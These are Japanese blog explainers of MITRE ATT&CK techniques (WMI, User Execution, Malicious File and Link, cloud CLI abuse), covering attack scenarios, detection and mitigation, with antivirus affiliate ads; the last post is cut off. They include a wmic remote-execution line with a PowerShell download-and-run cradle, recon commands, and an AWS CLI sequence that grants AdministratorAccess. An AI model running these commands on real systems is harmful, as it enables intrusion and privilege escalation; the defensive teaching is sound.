Windows Management Instrumentation（WMI）はWindows環境の管理に不可欠なインフラですが、攻撃者にとっても強力な武器です。MITRE ATT&CKではT1047 Windows Management Instrumentationとして分類されており、APTグループからランサムウェアまで幅広く悪用されています。本記事では、WMIを使った攻撃手法、実際の攻撃事例、検出方法と緩和策を日本語で詳しく解説します。

※本サイトはMITRE ATT&CK®の非公式日本語解説サイトです。Based on MITRE ATT&CK® v16。

ATT&CK情報

概要

T1047はExecution（実行 / TA0002）タクティクスに属するテクニックです。WMI（Windows Management Instrumentation）はWindowsに標準搭載された管理基盤で、システム情報の収集、プロセス管理、リモートでのコマンド実行、イベント監視などの機能を提供します。

攻撃者はWMIを使って、ローカルおよびリモートでのコマンド実行、システム情報の偵察、永続化メカニズムの設置（WMIイベントサブスクリプション）、横展開（Lateral Movement）を行います。WMIはOS標準機能であり、正規の管理操作と攻撃を区別しにくいため、Living-off-the-Land手法の代表格です。

WMIへのアクセスは主に3つの方法で行われます：wmic.exeコマンドラインツール（非推奨だがまだ利用可能）、PowerShellのGet-WmiObject/Get-CimInstanceコマンドレット、そしてWMIのCOMインターフェースを直接利用するスクリプトです。

攻撃シナリオ例

APT29（Cozy Bear）— WMIによるリモートコマンド実行

APT29は、初期侵入後の横展開フェーズでWMIを積極的に活用します。窃取した管理者資格情報を使い、WMIのリモート実行機能で他のマシンにペイロードを展開します：

:: WMICによるリモートプロセス実行の例（検知テスト用）
wmic /node:"192.168.1.100" /user:"DOMAIN\admin" /password:"..." process call create "cmd.exe /c powershell -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://...')"

この手法はRDP（リモートデスクトップ）と異なりGUIの操作痕跡を残さないため、フォレンジック調査で発見されにくい特徴があります。

WMIイベントサブスクリプションによる永続化

WMIイベントサブスクリプションは、特定のイベント（ユーザーログオン、特定時刻の到来など）をトリガーにしてコードを自動実行する仕組みです。攻撃者はこれを永続化メカニズムとして利用します：

• EventFilter: トリガー条件を定義（例: ユーザーがログオンした時）
• EventConsumer: 実行するアクション（例: PowerShellスクリプトを実行）
• FilterToConsumerBinding: トリガーとアクションを紐付け

この永続化手法はレジストリやスタートアップフォルダに痕跡を残さないため、従来の自動起動チェックでは発見が困難です。

ランサムウェアグループ — WMIによる大量展開

Ryuk、Contiなどのランサムウェアグループは、ドメイン管理者権限を取得した後、WMIを使ってネットワーク内の全マシンにランサムウェアを一斉展開します。wmic /node:@targets.txt process call createのようなコマンドで数百台のマシンに同時にペイロードを実行させ、被害を最大化します。

WMIによるシステム偵察

攻撃者は侵入後の情報収集にもWMIを多用します：

:: WMIによる偵察コマンドの例
wmic os get caption,version,osarchitecture    &:: OS情報
wmic process list brief                       &:: 実行中プロセス一覧
wmic service list brief                       &:: サービス一覧
wmic useraccount list brief                   &:: ユーザーアカウント一覧
wmic qfe list                                 &:: インストール済みパッチ一覧
wmic product get name,version                 &:: インストール済みソフトウェア

検出方法

プロセス監視

• wmic.exeの実行監視（Sysmon Event ID 1）: 特に/node:パラメータ（リモート実行）やprocess call create（プロセス生成）を含む実行を検出
• WmiPrvSE.exeの子プロセス: WMIプロバイダーホストプロセス（WmiPrvSE.exe）からcmd.exe/powershell.exeが起動された場合はリモートWMI実行の指標
• scrcons.exeの実行: WMIイベントサブスクリプションのスクリプトコンシューマーが実行された場合、永続化の可能性

Windowsイベントログ

• Microsoft-Windows-WMI-Activity/Operational（Event ID 5857〜5861）: WMIプロバイダーのロード、一時的/永続的イベントサブスクリプションの登録を記録
• Sysmon Event ID 19/20/21: WMIイベントフィルタ/コンシューマー/バインディングの作成を検出（永続化メカニズムの設置を検出）
• Sysmon Event ID 1: wmic.exeの起動とコマンドライン引数を記録
• Security Event ID 4648: 明示的な資格情報を使用したリモートWMI接続を検出

ネットワーク監視

• DCOM/RPC通信: TCP 135（RPC Endpoint Mapper）とランダム高ポートを使用するDCOM通信を監視
• WinRM通信: TCP 5985/5986（HTTP/HTTPS）でのCIM/WMI通信を監視

緩和策（Mitigations）

実務での推奨対策

• wmic.exeの使用制限: Microsoftはwmic.exeを非推奨としている。AppLocker/WDACでwmic.exeの実行をブロックし、必要な場合はPowerShellのGet-CimInstanceに移行
• WMI名前空間のACL設定: wmimgmt.mscでWMI名前空間のアクセス権を確認し、リモートアクセスを許可するアカウントを最小限に制限
• Sysmon導入・設定: Event ID 19/20/21でWMIイベントサブスクリプションの作成を監視し、永続化の試みを検出
• Windows Firewallの設定: 不要なリモートWMI（DCOM/RPC）通信をファイアウォールでブロック
• WMIイベントサブスクリプションの定期監査: Get-WmiObject -Namespace root\subscription -Class __EventFilterで不審なイベントフィルタを定期的にチェック

関連するテクニック

• T1059 Command and Scripting Interpreter: WMI経由で実行されるスクリプト（PowerShell、cmd.exe等）
• T1546.003 WMI Event Subscription: WMIイベントサブスクリプションによる永続化（Persistence）
• T1204 User Execution: ユーザー操作を起点としてWMI経由のスクリプト実行に連鎖するパターン

おすすめセキュリティ対策ツール

本記事で紹介した対策を実施するうえで役立つ製品をご紹介します。

🛡️ まず今日から始めるなら：エンドポイント保護ソフトの導入
攻撃者がWMIを使用する場合、振る舞い検知機能を持つエンドポイント保護が有効な緩和策となります。

• ESET（イーセット） ※PR — 軽量・企業向け実績あり
• ウイルスバスター ※PR — 日本語サポート充実・国産
• Norton（ノートン） ※PR — 世界最大手・VPN機能付き

※ 上記はアフィリエイトリンクです。料金・機能は各公式サイトで必ずご確認ください。

まとめ

• T1047 WMIは、Windows標準の管理基盤を悪用するLiving-off-the-Land手法であり、攻撃チェーンの複数段階で使用される
• リモートコマンド実行、WMIイベントサブスクリプションによる永続化、ランサムウェアの大量展開が主な悪用パターン
• Sysmon Event ID 19/20/21によるWMIサブスクリプション監視、WmiPrvSE.exeの子プロセス監視が検出の鍵
• wmic.exeの使用制限、WMI名前空間ACLの厳格化、リモートDCOM通信の制限が有効な緩和策

参考文献

• MITRE ATT&CK — T1047 Windows Management Instrumentation
• IPA（情報処理推進機構）セキュリティセンター
• MITRE ATT&CK公式サイト

Based on MITRE ATT&CK® v16, © The MITRE Corporation. Licensed under Apache License 2.0.
本ページは非公式翻訳・解説です。正確な情報はMITRE公式サイト（https://attack.mitre.org/）をご参照ください。

The post T1047 Windows Management Instrumentationとは？MITRE ATT&CK日本語解説 appeared first on AI Security Review.

メールに添付されたExcelファイルを開いたら感染した——この典型的な攻撃パターンは、MITRE ATT&CKでT1204.002 Malicious Fileとして体系化されています。Office文書のマクロ、偽のPDF、二重拡張子の実行ファイルなど、攻撃者はさまざまな手口でユーザーに悪意あるファイルを実行させます。本記事では、Malicious Fileの攻撃手法、検出方法、実務で有効な緩和策を日本語で詳しく解説します。

※本サイトはMITRE ATT&CK®の非公式日本語解説サイトです。Based on MITRE ATT&CK® v16。

ATT&CK情報

概要

T1204.002は、T1204 User ExecutionのSub-techniqueです。攻撃者はソーシャルエンジニアリングを使って、ユーザーに悪意あるファイルを開かせ、コードを実行させます。ファイルの種類は多岐にわたり、Office文書（マクロ付きWord/Excel）、PDF、ISO/IMGディスクイメージ、LNKショートカット、実行ファイル（.exe、.scr）、スクリプトファイル（.js、.vbs、.ps1）などが使用されます。

この手法はT1566.001（Spearphishing Attachment）と密接に関連しています。T1566.001がメール経由での配信（Initial Access）を指すのに対し、T1204.002はユーザーがファイルを開いて実行する行為（Execution）を指します。攻撃チェーンでは、T1566.001 → T1204.002 → T1059（スクリプト実行）という流れが典型的です。

近年はMicrosoftがインターネットからダウンロードしたOffice文書のマクロをデフォルトでブロックするようになったため、攻撃者はISO/IMGファイル、OneNote添付ファイル、LNKショートカットなどマクロに依存しない手法に移行する傾向が顕著です。

攻撃シナリオ例

Emotet — Office文書マクロによる感染チェーン

Emotetの代表的な感染チェーンは、業務メールを装ったOffice文書の添付ファイルです：

1. 請求書や見積書を装ったWord/Excelファイルがメールで配信される
2. ユーザーがファイルを開くと「コンテンツの有効化」を促す画面が表示される
3. ユーザーが「コンテンツの有効化」をクリックすると、VBAマクロ（T1059.005）が実行される
4. マクロがPowerShell（T1059.001）を起動し、C2サーバーからEmotet本体をダウンロード・実行

Qakbot — ISO/LNKファイルによるマクロ回避

Microsoftのマクロブロック後、QakbotはISOファイルを使った新しい感染手法に切り替えました：

1. メールにISOディスクイメージファイル（または ZIP内のISO）が添付される
2. ユーザーがISOをダブルクリックするとWindowsが仮想ドライブとしてマウント
3. 仮想ドライブ内のLNKショートカットをユーザーがクリック
4. LNKがcmd.exe（T1059.003）またはregsvr32.exeを起動してDLLを実行

ISOファイル内のファイルにはMark of the Web（MOTW）が付与されないため、SmartScreenによる警告を回避できる点が攻撃者にとっての利点でした（Microsoftは後にこの問題を修正）。

OneNote添付ファイル攻撃

2023年以降、OneNote（.one）ファイルを使った攻撃が急増しました。OneNoteファイル内にスクリプトやバッチファイルを埋め込み、「Double click to view document」等のボタンに偽装して実行させます。OneNoteはマクロブロックの対象外であったため、マクロの代替手段として注目されました。

検出方法

メールゲートウェイ

• 添付ファイルのサンドボックス解析: Office文書、PDF、ISO/IMG、OneNoteファイルを動的解析し、マクロ実行や外部通信を検出
• 危険な拡張子のブロック: .exe、.scr、.js、.vbs、.iso、.img、.one等の危険な添付ファイルをポリシーでブロック
• パスワード付きZIPの制限: サンドボックスを回避するためのパスワード付き添付を追加検査対象に

エンドポイント監視

• Officeプロセスの子プロセス監視（Sysmon Event ID 1）: WINWORD.EXE/EXCEL.EXE/ONENOTE.EXEからcmd.exe、powershell.exe、wscript.exe、mshta.exe等が起動された場合は高確度アラート
• ISOマウントの監視: explorer.exeによるISOマウント後のLNK実行チェーンを検出
• Mark of the Web（MOTW）の確認: Zone.Identifier ADS（代替データストリーム）の有無を確認し、MOTW回避の試みを検出

Windowsイベントログ

• Sysmon Event ID 1: プロセス生成（親プロセスがOfficeアプリケーション）
• Sysmon Event ID 11: ダウンロードフォルダ/Tempフォルダへのファイル作成
• Sysmon Event ID 15: ダウンロードされたファイルのADS（Zone.Identifier）作成
• Event ID 4688: コマンドライン引数付きプロセス生成の監査

緩和策（Mitigations）

実務での推奨対策

• Officeマクロの全社ブロック: グループポリシーでインターネットからダウンロードされたOfficeファイルのマクロをブロック（Microsoft推奨設定）
• ASR（Attack Surface Reduction）ルール: Microsoft Defender ASRルールで「Officeアプリケーションによる子プロセスの作成をブロック」を有効化
• 危険なファイル拡張子のブロック: メールゲートウェイで.iso、.img、.vhd、.one、.exe、.scr等を添付ブロック
• AppLocker/WDAC: ダウンロードフォルダ、Tempフォルダ、ユーザープロファイルフォルダからの実行ファイル起動をブロック
• 定期的なフィッシング訓練: 添付ファイル型のフィッシングシミュレーションを四半期ごとに実施

関連するSub-techniques

T1204.002はT1204 User ExecutionのSub-techniqueです。同じ親テクニックに属する他の手法：

• T1204.001 — Malicious Link: 悪意あるリンクをクリックさせる手法
• T1204.003 — Malicious Image: 悪意あるコンテナイメージ等を実行させる手法

攻撃チェーンにおける関連テクニック

• T1566.001（Spearphishing Attachment）: 悪意あるファイルをメールで配信（Initial Access）
• T1059（Command and Scripting Interpreter）: ファイル実行後にPowerShellやVBAがコマンドを実行

おすすめセキュリティ対策ツール

本記事で紹介した対策を実施するうえで役立つ製品をご紹介します。

🛡️ まず今日から始めるなら：エンドポイント保護ソフトの導入
攻撃者が悪意あるファイルを使用する場合、リアルタイムスキャンと振る舞い検知を持つエンドポイント保護が有効な緩和策となります。

• ESET（イーセット） ※PR — 軽量・企業向け実績あり
• ウイルスバスター ※PR — 日本語サポート充実・国産
• Norton（ノートン） ※PR — 世界最大手・VPN機能付き

※ 上記はアフィリエイトリンクです。料金・機能は各公式サイトで必ずご確認ください。

まとめ

• T1204.002 Malicious Fileは、悪意あるファイルをユーザーに開かせて実行させる手法であり、最も一般的な初期侵入パターンの一つ
• Office文書マクロからISO/LNK/OneNoteなどマクロに依存しない手法に攻撃トレンドが移行している
• Officeマクロブロック、ASRルール、AppLocker/WDAC、危険な拡張子のメールフィルタリングが有効な対策
• Sysmonによるプロセス監視で、Officeプロセスからの不審な子プロセス起動を検出できる

参考文献

• MITRE ATT&CK — T1204.002 Malicious File
• IPA（情報処理推進機構）セキュリティセンター
• MITRE ATT&CK公式サイト

Based on MITRE ATT&CK® v16, © The MITRE Corporation. Licensed under Apache License 2.0.
本ページは非公式翻訳・解説です。正確な情報はMITRE公式サイト（https://attack.mitre.org/）をご参照ください。

The post T1204.002 Malicious Fileとは？MITRE ATT&CK日本語解説 appeared first on AI Security Review.

フィッシングメールやSNSメッセージに含まれる悪意あるリンクをクリックしてしまう——これはサイバー攻撃で最も一般的な侵入経路の一つです。MITRE ATT&CKではT1204.001 Malicious Linkとして分類されており、あらゆる規模の攻撃で利用されています。本記事では、悪意あるリンクの手口、実際の攻撃事例、検出方法と対策を日本語で詳しく解説します。

※本サイトはMITRE ATT&CK®の非公式日本語解説サイトです。Based on MITRE ATT&CK® v16。

ATT&CK情報

概要

T1204.001は、T1204 User ExecutionのSub-techniqueです。攻撃者はソーシャルエンジニアリングを使って、ユーザーに悪意あるリンクをクリックさせます。リンク先では、マルウェアのダウンロード、認証情報の窃取ページへの誘導、ブラウザエクスプロイトの実行など、さまざまな攻撃が行われます。

悪意あるリンクは、フィッシングメール（T1566.002 Spearphishing Link）、SNSメッセージ、Webサイト上の広告、QRコード（クイッシング）、SMS（スミッシング）など多様な経路で配信されます。攻撃者はURL短縮サービス、オープンリダイレクト、正規ドメインの悪用、ホモグラフ攻撃（見た目が似た文字の使用）など、リンクの正当性を偽装する技術を駆使します。

日本国内でも、Amazonやヤマト運輸、銀行を騙るフィッシングリンクが大量に流通しており、IPA（情報処理推進機構）への相談件数は年々増加傾向にあります。

攻撃シナリオ例

APT28（Fancy Bear）— OAuth認証情報の窃取

ロシア系のAPT28は、Google/Microsoftのログインページを精巧に模倣したフィッシングサイトへのリンクを標的型メールで配信します。リンクをクリックしたユーザーは正規のログインページと区別できないサイトに誘導され、OAuth認証情報を入力してしまいます。窃取された認証情報はメールの閲覧・クラウドデータへのアクセスに利用されます。

国内事例 — ECサイト・宅配便を装うフィッシング

日本では以下のパターンが頻出しています：

• Amazon/楽天を装うメール: 「アカウントが停止されました」等の緊急メッセージで偽ログインページへ誘導し、クレジットカード情報を窃取
• 宅配便不在通知SMS（スミッシング）: 「お荷物をお届けできませんでした」というSMSのリンクから偽サイトへ誘導し、マルウェアをインストールまたは認証情報を窃取
• QRコード（クイッシング）: 偽の駐車場料金支払いQRコードや、正規ポスターに貼り付けた偽QRコードで悪意あるサイトへ誘導

ドライブバイダウンロード

攻撃者は悪意あるリンクの先に、ブラウザの脆弱性を突くエクスプロイトキットを仕込んだサイトを配置します。ユーザーがリンクをクリックしてページを表示するだけで、バックグラウンドでマルウェアがダウンロード・実行されます。この手法ではユーザーの追加操作が不要なため、特に危険度が高くなります。

検出方法

メールセキュリティ

• URLレピュテーション検査: メール内のURLをリアルタイムで脅威インテリジェンスDBと照合
• リンク書き換え（URL Rewriting）: メール内リンクをセキュリティゲートウェイ経由に書き換え、クリック時にリアルタイム検査
• 送信元認証（SPF/DKIM/DMARC）: なりすましメールの検出

Webプロキシ・DNS

• Webフィルタリング: カテゴリベースのURLフィルタリングで未分類・新規ドメインへのアクセスを制限
• DNS Sinkhole: 既知のフィッシングドメインをDNSレベルでブロック
• SSL/TLS検査: HTTPS通信の中身を検査し、暗号化された悪意ある通信を検出

エンドポイント監視

• ブラウザからの不審なプロセス起動: ブラウザプロセス→ダウンロード→実行のチェーンを監視
• ダウンロードフォルダの監視: 実行ファイル（.exe, .msi, .js, .vbs等）のダウンロード後即時実行を検知

緩和策（Mitigations）

実務での推奨対策

• メールリンク書き換え: Microsoft Defender for Office 365のSafe Links、Proofpoint URL Defenseなどを導入し、クリック時にリアルタイムURL検査を実施
• 多要素認証（MFA）の必須化: フィッシングで認証情報が窃取されても、MFAにより不正ログインを防止
• FIDO2/パスキーの導入: フィッシング耐性のある認証方式の導入を検討（フィッシングサイトでは認証が成立しない）
• 定期的なフィッシング訓練: GoPhish等のツールで定期的にフィッシングシミュレーションを実施
• 報告文化の醸成: 不審なメールの報告ボタン（Outlookアドイン等）を設置し、報告を評価する文化を作る

関連するSub-techniques

T1204.001はT1204 User ExecutionのSub-techniqueです。同じ親テクニックに属する他の手法：

• T1204.002 — Malicious File: 悪意あるファイルを開かせて実行させる手法
• T1204.003 — Malicious Image: 悪意あるコンテナイメージ等を実行させる手法

攻撃チェーンにおける関連テクニック

• T1566.002（Spearphishing Link）: メール経由で悪意あるリンクを配信する手法（Initial Access）
• T1059（Command and Scripting Interpreter）: リンク経由でダウンロードされたペイロードがスクリプトを実行

おすすめセキュリティ対策ツール

本記事で紹介した対策を実施するうえで役立つ製品をご紹介します。

🛡️ まず今日から始めるなら：エンドポイント保護ソフトの導入
攻撃者が悪意あるリンクを使用する場合、Webフィルタリング機能を持つエンドポイント保護が有効な緩和策となります。

• ESET（イーセット） ※PR — 軽量・企業向け実績あり
• ウイルスバスター ※PR — 日本語サポート充実・国産
• Norton（ノートン） ※PR — 世界最大手・VPN機能付き

※ 上記はアフィリエイトリンクです。料金・機能は各公式サイトで必ずご確認ください。

まとめ

• T1204.001 Malicious Linkは、悪意あるリンクをクリックさせてマルウェア実行や認証情報窃取を行う手法である
• フィッシングメール、SMS、QRコードなど多様な配信経路があり、URL偽装技術も高度化している
• メールリンク書き換え、Webフィルタリング、MFA必須化が有効な技術的対策
• 定期的なフィッシング訓練と報告文化の醸成が、組織全体の耐性を高める

参考文献

• MITRE ATT&CK — T1204.001 Malicious Link
• IPA（情報処理推進機構）セキュリティセンター
• MITRE ATT&CK公式サイト

Based on MITRE ATT&CK® v16, © The MITRE Corporation. Licensed under Apache License 2.0.
本ページは非公式翻訳・解説です。正確な情報はMITRE公式サイト（https://attack.mitre.org/）をご参照ください。

The post T1204.001 Malicious Linkとは？MITRE ATT&CK日本語解説 appeared first on AI Security Review.

サイバー攻撃の多くは、最終的にユーザー自身の操作によってマルウェアが実行されます。MITRE ATT&CKではT1204 User Executionとして、攻撃者がユーザーの操作に依存してコードを実行させる手法を体系化しています。フィッシングメールの添付ファイルを開く、悪意あるリンクをクリックする——これらは全てUser Executionに分類されます。本記事では、この手法の全体像、Sub-technique、検出方法と緩和策を日本語で詳しく解説します。

※本サイトはMITRE ATT&CK®の非公式日本語解説サイトです。Based on MITRE ATT&CK® v16。

ATT&CK情報

概要

T1204 User Executionは、Execution（実行 / TA0002）タクティクスに属するテクニックです。このテクニックは、攻撃者が悪意あるコードをユーザー自身に実行させることを指します。技術的なエクスプロイトとは異なり、ソーシャルエンジニアリングによってユーザーの信頼や不注意を利用する点が特徴です。

User Executionは多くの攻撃チェーンでInitial Access（初期侵入）からExecution（実行）への橋渡しとして機能します。典型的なパターンは、T1566（Phishing）で配信されたメールに含まれる悪意あるリンクやファイルを、ユーザーがクリック・実行するというものです。

攻撃者はユーザーの操作を誘導するために、業務に関連する内容を装ったメール、緊急性を煽るメッセージ、信頼できる送信元の偽装など、さまざまなソーシャルエンジニアリング手法を組み合わせます。

攻撃シナリオ例

Emotet — 大規模フィッシング経由のUser Execution

Emotetは、世界的に最も広く拡散したマルウェアの一つであり、User Executionを攻撃チェーンの中核に位置付けています。

1. T1566.001（Spearphishing Attachment）: 業務メールに見せかけたメールにWord/Excelファイルを添付
2. T1204.002（Malicious File）: ユーザーがファイルを開き、「コンテンツの有効化」をクリック
3. T1059.005（Visual Basic）: VBAマクロが実行され、PowerShellを起動
4. C2サーバーからEmotet本体をダウンロード・実行

このチェーンは、ユーザーが「ファイルを開く」「マクロを有効にする」という2つの操作を行うことで成立します。

APT29 — 標的型攻撃でのUser Execution

APT29（Cozy Bear）は、標的組織の業務内容を詳細に調査した上で、極めて精巧なフィッシングメールを送信します。受信者は業務上必要な文書と判断してファイルを開くため、User Executionの成功率が非常に高くなります。外交文書や政策レポートを装ったPDFやLNKファイルが頻繁に使用されています。

BEC（ビジネスメール詐欺）との組み合わせ

日本国内でも被害が急増しているBEC（Business Email Compromise）攻撃では、経営者や取引先を装ったメールで添付ファイルの確認やリンクのクリックを指示します。IPA「情報セキュリティ10大脅威 2026」でも、フィッシング・BEC関連の脅威が上位にランクインしています。

検出方法

メールゲートウェイ

• 添付ファイルのサンドボックス分析: Office文書、PDF、実行ファイルをサンドボックスで動的解析し、マクロ実行や外部通信の有無を確認
• URLレピュテーション: メール本文・添付ファイル内のURLをレピュテーションサービスで検査
• 送信元認証: SPF、DKIM、DMARCの検証結果を確認し、送信元偽装を検出

エンドポイント監視

• Officeプロセスからの子プロセス生成（Windows）: WINWORD.EXE→cmd.exe/powershell.exeのプロセスチェーンはUser Executionの典型的指標（Sysmon Event ID 1）
• ファイルダウンロード後の実行: ブラウザのダウンロードディレクトリから直接実行されたファイルを監視
• マクロ実行の監視: Officeアプリケーションの保護ビュー解除やマクロ有効化のイベントを記録

Windowsイベントログ

• Sysmon Event ID 1（Process Creation）: Officeプロセスからの子プロセス起動を検出
• Sysmon Event ID 11（File Created）: ダウンロードフォルダやTempフォルダへの不審なファイル作成を検出
• Event ID 4688（Process Creation with Audit Policy）: コマンドライン引数付きのプロセス作成を記録

緩和策（Mitigations）

実務での推奨対策

• Officeマクロの制限: グループポリシーでインターネットからダウンロードされたOfficeファイルのマクロ実行を無効化（Mark of the Web + マクロブロック）
• 定期的なフィッシング訓練: 四半期ごとにフィッシングシミュレーションを実施し、クリック率を計測・改善
• メール添付ファイルの自動サンドボックス: Microsoft Defender for Office 365やProofpoint等のサンドボックス機能を有効化
• AppLocker/WDACの導入: ダウンロードフォルダやTempフォルダからの実行ファイル起動をブロック
• SPF/DKIM/DMARC: メール送信元認証を厳格に設定し、なりすましメールを検出

関連するSub-techniques

T1204 User Executionには以下のSub-techniqueがあります：

• T1204.001 — Malicious Link: 悪意あるリンクをクリックさせてマルウェアをダウンロード・実行させる手法
• T1204.002 — Malicious File: 悪意あるファイル（Office文書、PDF、実行ファイル等）を開かせて実行させる手法
• T1204.003 — Malicious Image: 悪意あるコンテナイメージ等を実行させる手法

攻撃チェーンにおける関連テクニック

• T1566（Phishing）: User Executionの前段階としてフィッシングメールが配信される
• T1059（Command and Scripting Interpreter）: User Execution後にPowerShellやVBA等のスクリプトが実行される

おすすめセキュリティ対策ツール

本記事で紹介した対策を実施するうえで役立つ製品をご紹介します。

🛡️ まず今日から始めるなら：エンドポイント保護ソフトの導入
攻撃者がUser Executionを使用する場合、メールフィルタリングとエンドポイント保護の組み合わせが有効な緩和策となります。

• ESET（イーセット） ※PR — 軽量・企業向け実績あり
• ウイルスバスター ※PR — 日本語サポート充実・国産
• Norton（ノートン） ※PR — 世界最大手・VPN機能付き

※ 上記はアフィリエイトリンクです。料金・機能は各公式サイトで必ずご確認ください。

まとめ

• T1204 User Executionは、ソーシャルエンジニアリングによりユーザー自身にマルウェアを実行させる手法である
• フィッシングメール→ファイル/リンク→実行という攻撃チェーンが最も一般的なパターン
• Officeマクロの制限、メールサンドボックス、フィッシング訓練が有効な緩和策
• 技術的対策とユーザー教育の両面からアプローチすることが重要

参考文献

• MITRE ATT&CK — T1204 User Execution
• IPA（情報処理推進機構）セキュリティセンター
• MITRE ATT&CK公式サイト

Based on MITRE ATT&CK® v16, © The MITRE Corporation. Licensed under Apache License 2.0.
本ページは非公式翻訳・解説です。正確な情報はMITRE公式サイト（https://attack.mitre.org/）をご参照ください。

The post T1204 User Executionとは？MITRE ATT&CK日本語解説 appeared first on AI Security Review.

AWS CLI、Azure CLI、GCloud CLIなどのクラウド管理コマンドは、クラウドインフラを効率的に運用するために欠かせないツールです。しかし、これらの正規ツールが攻撃者に悪用されると、IAMロールの権限で任意のクラウドリソースを操作され、データ漏洩やインフラ破壊に直結します。本記事ではMITRE ATT&CK T1059.009「Cloud Administration Command」の定義、具体的な攻撃シナリオ、検知方法、そして実践的な防御策を、セキュリティ担当者・クラウドエンジニア向けに詳しく解説します。

T1059.009 Cloud Administration Commandとは

MITRE ATT&CK T1059.009は、攻撃者がクラウドプロバイダ提供の管理コマンドやCLIツールを利用して悪意ある操作を行う手法です。MITRE ATT&CK公式のT1059.009ページでは、親テクニックT1059 Command and Scripting Interpreterのサブテクニックとして分類されています。

従来のT1059.001 PowerShellやBashなどはOS上のコマンドインタプリタが対象でしたが、T1059.009はクラウドネイティブな管理インターフェースに焦点を当てています。対象となるのはAWS CLI、Azure CLI、Azure PowerShell、Google Cloud SDK（gcloud）、AWS CloudShellなどです。

なぜ攻撃者はクラウド管理コマンドを悪用するのか

クラウド管理コマンドが攻撃者にとって魅力的な理由は以下の3点です。

正規ツールであるため検知が困難

AWS CLIやAzure CLIは運用チームが日常的に使用するツールです。攻撃者がこれらを使うと、正規の運用操作と悪意ある操作の区別が非常に困難になります。これは「Living off the Land（環境寄生型攻撃）」のクラウド版と言えます。

強力な権限へのアクセス

クラウドCLIはIAMロールやサービスプリンシパルに紐づいた権限で動作します。過剰な権限が付与されたIAMロールが漏洩した場合、攻撃者はS3バケットの全データダウンロード、EC2インスタンスの起動・停止、IAMポリシーの変更など、広範な操作を実行できます。

マルウェア不要で攻撃が完結

クラウドCLIはAPIを直接呼び出すため、マルウェアのインストールが不要です。認証情報（アクセスキーやトークン）さえ入手すれば、攻撃者のローカル環境から直接クラウドリソースを操作できてしまいます。

AWS CloudShellの悪用シナリオ

AWS CloudShellはAWSマネジメントコンソールからブラウザ上で直接CLIを実行できるサービスです。攻撃者がAWSコンソールへのアクセス権を得た場合、以下のような悪用が可能になります。

シナリオ1：コンソールセッションハイジャック

フィッシングや認証情報の窃取によりAWSコンソールにログインした攻撃者は、CloudShellを起動して追加のツールインストールなしに即座にAWS CLIコマンドを実行できます。CloudShellはセッションユーザーのIAM権限を自動的に引き継ぐため、権限設定によっては甚大な被害を引き起こします。

シナリオ2：永続化のためのバックドア作成

CloudShellからaws iam create-access-keyコマンドで新しいアクセスキーを生成し、外部に送信するケースがあります。また、aws lambda create-functionでバックドア用のLambda関数をデプロイするなど、永続的なアクセス手段を確保する手法も報告されています。

IAMロール悪用との組み合わせ

T1059.009は単独で使用されることもありますが、IAMロールの悪用と組み合わさることで被害が拡大します。

権限昇格チェーン

攻撃者は初期アクセスで得た限定的な権限から、以下のようなステップで権限を昇格させます。

1. 漏洩したアクセスキーでaws sts get-caller-identityを実行し、現在の権限を確認
2. aws iam list-attached-user-policiesでポリシーを列挙
3. aws iam attach-user-policy --policy-arn arn:aws:iam::aws:policy/AdministratorAccessで管理者権限を付与
4. 管理者権限で任意のリソースを操作

クロスアカウントロールの悪用

Azure環境ではaz account listでアクセス可能なサブスクリプションを列挙し、az role assignment createで他のサブスクリプションへの権限を取得するケースがあります。GCP環境でもgcloud projects listとgcloud projects add-iam-policy-bindingの組み合わせで同様の横展開が可能です。

実際の攻撃事例

クラウド管理コマンドを悪用する脅威アクターの活動が複数報告されています。

TeamTNTによるクラウドリソースの不正利用

TeamTNTはクラウド環境を標的としたクリプトマイニンググループです。AWSのメタデータサービス（169.254.169.254）から認証情報を窃取し、AWS CLIを使ってEC2インスタンスの大量起動やS3バケットへのアクセスを行います。

ScarletEelによるAWS環境への侵入

ScarletEelは、Kubernetes環境への初期侵入後にAWS CLIを使って認証情報を列挙し、クロスアカウントでのラテラルムーブメントを行ったことが報告されています。aws sts assume-roleを使い、複数のAWSアカウントを横断して暗号資産マイニングインフラを構築しました。

LUCR-3（Scattered Spider）によるSaaS・クラウド攻撃

LUCR-3はソーシャルエンジニアリングでIDP（Identity Provider）への初期アクセスを取得し、Azure CLIやAWS CLIを使ってクラウドリソースを操作することで知られています。特にAzure ADの設定変更やAWSのOrganizations操作を通じた大規模な情報窃取が確認されています。

検知方法

クラウド管理コマンドの悪用を検知するには、各クラウドプロバイダの監査ログを活用します。

AWS CloudTrailによる検知

AWS CloudTrailはすべてのAPI呼び出しを記録します。以下のイベントを監視することで不審な操作を検知できます。

• CreateAccessKey：新しいアクセスキーの生成（バックドア作成の兆候）
• AssumeRole：ロールの引き受け（権限昇格・ラテラルムーブメント）
• ConsoleLogin + CloudShell起動：通常と異なるIPアドレスからのログイン後のCloudShell使用
• PutBucketPolicy：S3バケットポリシーの変更（データ流出の準備）

Azure Monitorによる検知

Azure Activity LogとMicrosoft Entra ID（旧Azure AD）のサインインログを組み合わせて監視します。az role assignment createの実行、通常と異なるIPアドレスからのAzure CLI認証、サービスプリンシパルの新規作成などが重要な検知ポイントです。

GCP Audit Logsによる検知

GCP Cloud Audit Logsでは、Admin Activity ログとData Access ログを有効にし、SetIamPolicyの呼び出し、新規サービスアカウントキーの作成、通常と異なるリージョンからのAPI呼び出しを監視します。

共通の検知ルール

どのクラウドプロバイダでも有効な検知アプローチとして、以下のルールを設定することを推奨します。

• 通常の運用時間外（深夜・休日）のCLI操作のアラート
• 新しいIPアドレスやユーザーエージェントからのAPI呼び出し
• 短時間での大量API呼び出し（偵察活動の兆候）
• IAM関連操作（権限変更・キー作成）の即時アラート

緩和策と防御のベストプラクティス

最小権限のIAMポリシー設計

IAMポリシーは最小権限の原則（Principle of Least Privilege）に基づいて設計します。*ワイルドカードの使用を避け、必要なリソースとアクションのみを許可するポリシーを作成してください。AWSではIAM Access Analyzerを使って実際のアクセスパターンからポリシーを生成できます。

条件付きアクセスポリシーの適用

Azure Conditional Access PolicyやAWS IAM Conditionを使い、信頼できるIPアドレス、デバイス、時間帯のみからCLI操作を許可します。特にMFA（多要素認証）の強制は基本中の基本です。

CloudShellの利用制限

AWS CloudShellは便利ですが、攻撃者にも同様に便利です。IAMポリシーでcloudshell:*の権限を制限するか、AWS Organizations SCP（Service Control Policy）でCloudShellの利用を特定のアカウントや役割に限定することを検討してください。

認証情報の管理強化

